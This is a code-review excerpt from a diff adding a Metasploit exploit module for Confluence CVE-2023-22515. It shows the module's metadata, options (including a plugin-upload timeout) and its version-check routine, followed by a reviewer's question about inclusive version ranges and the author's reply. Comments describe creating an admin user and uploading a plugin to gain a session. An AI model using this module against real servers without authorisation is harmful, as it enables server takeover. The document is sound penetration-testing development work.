modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb

```diff
@@ -0,0 +1,327 @@
+          ['URL', 'https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis'],
+          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html'],
+        ],
+        'DisclosureDate' => '2023-10-04',
+        'Privileged' => false, # `NT AUTHORITY\NETWORK SERVICE` on Windows by default.
+        'Targets' => [
+          [
+            'Automatic',
+            {
+              'Platform' => 'java',
+              'Arch' => [ARCH_JAVA]
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          # Note we cannot delete the admin user we create, as Confluence prevents a user deleting themself.
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        # By default Confluence listens for HTTP requests on TCP port 8090.
+        Opt::RPORT(8090),
+        # Confluence may have a non default base path, allow user to configure that here.
+        OptString.new('TARGETURI', [true, 'Base path for Confluence', '/']),
+        # The endpoint we target to trigger the vulnerability.
+        OptString.new('CONFLUENCE_TARGET_ENDPOINT', [true, 'The endpoint used to trigger the vulnerability.', 'server-info.action']),
+        # We upload a new plugin, we need to wait for the plugin to be installed. This options governs how long we wait.
+        OptInt.new('CONFLUENCE_PLUGIN_TIMEOUT', [true, 'The timeout (in seconds) to wait when installing a plugin', 30])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, datastore['CONFLUENCE_TARGET_ENDPOINT'])
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    # Ensure target is a Confluence server by identifying an expected HTTP header.
+    return CheckCode::Unknown('No \'X-Confluence-Request-Time\' header') unless res.headers.key? 'X-Confluence-Request-Time'
+
+    if res.code == 200 && res.body
+      # Pull out the version string from one of three known locations within the HTML.
+      m = res.body.match(/ajs-version-number" content="(\d+\.\d+\.\d+)"/i)
+      if m.nil?
+        m = res.body.match(/Printed by Atlassian Confluence (\d+\.\d+\.\d+)/i)
+        if m.nil?
+          m = res.body.match(%r{<span id='footer-build-information'>(\d+\.\d+\.\d+)</span>}i)
+        end
+      end
+
+      unless m.nil?
+        version = Rex::Version.new(m[1])
+
+        ranges = [
+          ['8.0.0', '8.3.2'],
+          ['8.4.0', '8.4.2'],
+          ['8.5.0', '8.5.1']
+        ]
+
+        # If we have a Confluence server within the given version ranges, it appears vulnerable.
+        ranges.each do |min, max|
+          if version.between?(Rex::Version.new(min), Rex::Version.new(max))
```

Comment:
@stephenfewer Won't this specifically exclude the edge cases such as 8.0.0 and 8.3.2 which are also technically vulnerable?

Reply:
Hi @grantwillcoxh3ai, in my testing `between?` will include the min and max version as part of the range check, so the check routine should work as expected. I was testing against 8.5.1 (one of the edge cases you mention) and the check was successful.